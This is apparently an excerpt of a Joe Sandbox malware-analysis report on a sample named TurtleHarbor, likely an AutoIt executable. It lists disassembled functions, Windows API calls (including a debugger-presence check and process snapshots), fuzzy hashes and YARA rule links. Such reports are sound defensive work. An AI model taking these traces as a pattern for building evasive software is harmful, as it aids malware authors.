Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HandleInitialize
String ID: <w=
API String ID: 3139323997-3928385222
Opcode ID: 950998cd3b37e9054e03d6d1f93fecfc3ecad3a7929161b17680f0c053b304c5
Instruction ID: 520e26a5ce952d4338cabec53a05e346ebc48aaff826e7ebec773548820c92ae
Opcode Fuzzy Hash: 950998cd3b37e9054e03d6d1f93fecfc3ecad3a7929161b17680f0c053b304c5
Instruction Fuzzy Hash: 2351CBB090E2908EC39BDF2ABD452697FFDEB5A314B10856BD418CB2B2FB344445CB51

Function 00311284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00311275,SwapMouseButtons,00000004,?), ref: 003112A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00311275,SwapMouseButtons,00000004,?), ref: 003112C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00311275,SwapMouseButtons,00000004,?), ref: 003112EB

Strings

Control Panel\Mouse, xrefs: 003112A6

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 70775c75da8c2e395022c256b5215bf906113e858a964f849fc838a0938a0c00
Instruction ID: 9c88e4844c3d09ecc62444d195fca0d0bd40ae4e1548338b4553f1e1ab809765
Opcode Fuzzy Hash: 70775c75da8c2e395022c256b5215bf906113e858a964f849fc838a0938a0c00
Instruction Fuzzy Hash: 75114875515208BFDB268FA4DC84AEFBBACEF09740F004959E945D7110E2719E8197A0

Function 00325B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00325B58

Part of subcall function 003256F8: _memset.LIBCMT ref: 00325787
Part of subcall function 003256F8: _wcscpy.LIBCMT ref: 003257DB
Part of subcall function 003256F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003257EB

KillTimer.USER32(?,00000001,?,?), ref: 00325BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00325BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00360D7C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 66b6ee08db6a406ab2aa63a41e6ddc219fc7a47a105fcb67232efdfc9cbb23df
Instruction ID: 1a47c33f06dc9884e18c9e6e411c47e848dbe6c57010278c28bff2735222487c
Opcode Fuzzy Hash: 66b6ee08db6a406ab2aa63a41e6ddc219fc7a47a105fcb67232efdfc9cbb23df
Instruction Fuzzy Hash: 26213870904794AFE7778B64DC96FEBBFECAF02308F00458DE69A56281C3742A84CB41

Function 0032278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 003249C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,003227AF,?,00000001), ref: 003249F4

_free.LIBCMT ref: 0035FB04
_free.LIBCMT ref: 0035FB4B

Part of subcall function 003229BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00322ADF

Strings

Bad directive syntax error, xrefs: 0035FB33

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: fbe5be7ff214f6f1585e7ed995a1d2e9af10c3f241e2962c03521e5372384123
Instruction ID: 9cd4effb2cab2cb5b3ae7d9a2fd46ea608f46d8ac2774b18d0efdfa60d139d2c
Opcode Fuzzy Hash: fbe5be7ff214f6f1585e7ed995a1d2e9af10c3f241e2962c03521e5372384123
Instruction Fuzzy Hash: C3917171910229AFCF16EFA4DC91DEEB7B8FF05311F14452AF816AB2A1DB349909CB50

Function 003248B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003248FA

Strings

EA06, xrefs: 003608A1
AU3! ?:, xrefs: 003248F4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memmove
String ID: AU3! ?:$EA06
API String ID: 4104443479-874976573
Opcode ID: 77fe81df199318701b897e913be68e5228cd0362395b9ebb1b9caee0d434d61a
Instruction ID: 742671d2d4f0f96bba9822b355f8fbe2626ef99d1d060d6bc46b2e46c2c5fd7b
Opcode Fuzzy Hash: 77fe81df199318701b897e913be68e5228cd0362395b9ebb1b9caee0d434d61a
Instruction Fuzzy Hash: 5C415C32A041785BDF27DB64A8527BF7FA98B55300F698075E882EF287D7218DC487E1

Function 00379CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00324AB2: __fread_nolock.LIBCMT ref: 00324AD0

_wcscmp.LIBCMT ref: 00379DE1
_wcscmp.LIBCMT ref: 00379DF4

Strings

FILE, xrefs: 00379D2D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: e98a8d88937050790d881b85e4c7405f9d4c585d427f83e1466b830dca34098b
Instruction ID: ffdf0a5e7f71b6afcfe8538b709eae9181e11ede68ecb8786d00f819d1c10551
Opcode Fuzzy Hash: e98a8d88937050790d881b85e4c7405f9d4c585d427f83e1466b830dca34098b
Instruction Fuzzy Hash: 37412971A00219BADF22DAA4DC45FEFB7FDDF45710F00416AF904EF180D675A9048764

Function 003231BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0036032B
GetOpenFileNameW.COMDLG32(?), ref: 00360375

Part of subcall function 00330284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00322A58,?,00008000), ref: 003302A4

Part of subcall function 003309C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003309E4

Strings

X, xrefs: 00360343

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 591f5cf3ad559bc8548e9fac22770ae0be08ca3c5ff03b59708acd3bfbf50b99
Instruction ID: 90fe0eeb909b32b848a1296305ef8e444a89e29f9bbe7b1b7819f6eee64dbad5
Opcode Fuzzy Hash: 591f5cf3ad559bc8548e9fac22770ae0be08ca3c5ff03b59708acd3bfbf50b99
Instruction Fuzzy Hash: 53219375A042989BCB46DF94DC45BEE7BFC9F49304F10405AE404EB241DBB55A88DFA1

Function 0038D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8674540efe9c80f1eb0e1d5bf589c97fd08630f114748b9d88f856848e1f4e0
Instruction ID: c43cbcd0ef10e2d7bb51743a58543ff449430c9ff5a5af5c010266756ade155b
Opcode Fuzzy Hash: d8674540efe9c80f1eb0e1d5bf589c97fd08630f114748b9d88f856848e1f4e0
Instruction Fuzzy Hash: 61F15DB06083059FC715EF28C484A6ABBE5FF89314F54896EF8999B391D730E945CF82

Function 003259D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003259F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00325A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00325ABB

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 479d897da54b982cd4ca1ed3c3a3c5eaa4c86949219c71cbc6794abc93b6860c
Instruction ID: a1af544a98a48b89daf3c9125a3e9e4a9ad9b72e167691e1c900c8408033a6cb
Opcode Fuzzy Hash: 479d897da54b982cd4ca1ed3c3a3c5eaa4c86949219c71cbc6794abc93b6860c
Instruction Fuzzy Hash: 6B3171B05097518FD727DF24E885697BBF8FB49304F000E2EF59A87250E771AA44CB52

Function 0033593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00335953

Part of subcall function 0033A39B: __NMSG_WRITE.LIBCMT ref: 0033A3C2
Part of subcall function 0033A39B: __NMSG_WRITE.LIBCMT ref: 0033A3CC

__NMSG_WRITE.LIBCMT ref: 0033595A

Part of subcall function 0033A3F8: GetModuleFileNameW.KERNEL32(00000000,003D53BA,00000104,?,00000001,00331003), ref: 0033A48A
Part of subcall function 0033A3F8: ___crtMessageBoxW.LIBCMT ref: 0033A538

Part of subcall function 003332CF: ___crtCorExitProcess.LIBCMT ref: 003332D5
Part of subcall function 003332CF: ExitProcess.KERNEL32 ref: 003332DE

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

RtlAllocateHeap.NTDLL(01000000,00000000,00000001,?,?,?,?,00331003,?,0000FFFF), ref: 0033597F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 9cfc9bfa7977ae46d55e1ffc16dc162f87f520659bd7a6da47afb71f6ce95b44
Instruction ID: 0ce8643c7b946b994b3142bd3093ac57155c9d5c6f189246c9303d0018bc5e79
Opcode Fuzzy Hash: 9cfc9bfa7977ae46d55e1ffc16dc162f87f520659bd7a6da47afb71f6ce95b44
Instruction Fuzzy Hash: FE01BC36242B06EAE6172B28ECC2B6E334C9F52770F52052BF855AF2E1DF708D404B61

Function 003792C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003792D6

Part of subcall function 00332F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00339C54,00000000,00338D5D,003359C3,?), ref: 00332F99
Part of subcall function 00332F85: GetLastError.KERNEL32(00000000,?,00339C54,00000000,00338D5D,003359C3,?), ref: 00332FAB

_free.LIBCMT ref: 003792E7
_free.LIBCMT ref: 003792F9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: 5c017c6da6fcd741bb7bb895115192c8d07479e66b7a66fab060b9a10339f34a
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: 97E012B160560257CA35B5786985FA377EC4F88752B160A1EF80DDB143CE28E8518168

Function 00377221 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00000002,?,?,00376F4D,00000000), ref: 00377237
GetCurrentProcess.KERNEL32(?,00000000,?,00376F4D,00000000), ref: 0037723F
DuplicateHandle.KERNELBASE(00000000,?,00376F4D,00000000), ref: 00377246

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 61172f1b5e18927609c9a55bfb56de603a2cb76f5ada3a5518ffb6c7e74bafb4
Instruction ID: 44629eecad367944c8b2d3e26756774fe563b8109edb31b7e1778d1e6827f5f0
Opcode Fuzzy Hash: 61172f1b5e18927609c9a55bfb56de603a2cb76f5ada3a5518ffb6c7e74bafb4
Instruction Fuzzy Hash: 8DD05E7A144305BFC7171BE5EC0DF7B7B3CDBD6B22F218819F60985161AB78A8009664

Function 00377079 Relevance: 4.5, APIs: 3, Instructions: 17COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003777EB: InterlockedExchange.KERNEL32(?,?), ref: 003777FE
Part of subcall function 003777EB: EnterCriticalSection.KERNEL32(?,?,0031C2B6,?,?), ref: 0037780F
Part of subcall function 003777EB: TerminateThread.KERNEL32(00000000,000001F6,?,0031C2B6,?,?), ref: 0037781C
Part of subcall function 003777EB: WaitForSingleObject.KERNEL32(00000000,000003E8,?,0031C2B6,?,?), ref: 00377829
Part of subcall function 003777EB: InterlockedExchange.KERNEL32(?,000001F6), ref: 0037783C
Part of subcall function 003777EB: LeaveCriticalSection.KERNEL32(?,?,0031C2B6,?,?), ref: 00377843

FindCloseChangeNotification.KERNELBASE(?,?,003770DF), ref: 0037708A
CloseHandle.KERNEL32(?,?,003770DF), ref: 00377093
DeleteCriticalSection.KERNEL32(?,?,003770DF), ref: 003770A6

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CriticalSection$CloseExchangeInterlocked$ChangeDeleteEnterFindHandleLeaveNotificationObjectSingleTerminateThreadWait
String ID:
API String ID: 744473657-0
Opcode ID: d535ad0d3af8e4fcb6959bb97ece79a5921ec03840d62e8ffe5562f530fb9489
Instruction ID: d119621c6bcdc07f4183caa9fcadec034aa1fc34ee80152561eabf8e2d6ca22b
Opcode Fuzzy Hash: d535ad0d3af8e4fcb6959bb97ece79a5921ec03840d62e8ffe5562f530fb9489
Instruction Fuzzy Hash: F6E0E27B004642AFCB4B2FA4FC08889BB79BF49711B240122F10986970CBB1A4A4CB50

Function 00315E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 0034E234

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 27233ef876cd9961e3daeb69c5caf7d5d297599bd3436831ac3b262551c54a3d
Instruction ID: 68a25999898f53aca790660bfa8768b9373b36cefbba8580d91db77cdb9fb888
Opcode Fuzzy Hash: 27233ef876cd9961e3daeb69c5caf7d5d297599bd3436831ac3b262551c54a3d
Instruction Fuzzy Hash: 9E326A74508341DFC72ADF54C491AAAB7E5BF89300F15896DF88A9B362D731EC85CB82

Function 0038E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 0038E20C

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

_wcscpy.LIBCMT ref: 0038E29B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: bf14f6d3acb2b83cd404dee5eacdb030a8267f33be7f1e9d765eae6b15d2859b
Instruction ID: e03ccae742dde2c4d747173abcee260f88ab7bd336dba734738dc9eea22c8b16
Opcode Fuzzy Hash: bf14f6d3acb2b83cd404dee5eacdb030a8267f33be7f1e9d765eae6b15d2859b
Instruction Fuzzy Hash: B9913A35A00604DFCB1AEF18C5819ADB7E5FF99314B558099F81A8F7A2DB30EE41CB80

Function 00330E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00330ED5
CreateToolhelp32Snapshot.KERNEL32 ref: 00330EE7

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ChangeCloseCreateFindNotificationSnapshotToolhelp32
String ID:
API String ID: 4162189087-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 850454d095613e891c9f59ac316de6c04b72a1242d94cdd1e094d78b0f20a0df
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: A631D170B005099BC71ADF58C4E0969F7A6FF49340F658AA5E40ACB661EB31EDC1CB80

Function 00325F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00325FEF

Part of subcall function 0033359C: __lock.LIBCMT ref: 003335A2
Part of subcall function 0033359C: DecodePointer.KERNEL32(00000001,?,00326004,00368892), ref: 003335AE
Part of subcall function 0033359C: EncodePointer.KERNEL32(?,?,00326004,00368892), ref: 003335B9

Part of subcall function 00325F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00325F18
Part of subcall function 00325F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00325F2D

Part of subcall function 00325240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0032526C
Part of subcall function 00325240: IsDebuggerPresent.KERNEL32 ref: 0032527E
Part of subcall function 00325240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 003252E6
Part of subcall function 00325240: SetCurrentDirectoryW.KERNEL32(?), ref: 00325366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0032602F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: f9147714d5f8fe85936211ff830f29e270ed99cb486f49b5da38253dd5ddaf52
Instruction ID: e5ad67fc006a1893451ef436327714f5a528fbef94b8a7235cb4a5874d6898a0
Opcode Fuzzy Hash: f9147714d5f8fe85936211ff830f29e270ed99cb486f49b5da38253dd5ddaf52
Instruction Fuzzy Hash: 8F118E718093519BC712DF69FD4595ABBFCEF99310F00891FF044872A1EB709644CB91

Function 0033581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0033584C
__lock_file.LIBCMT ref: 0033586D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

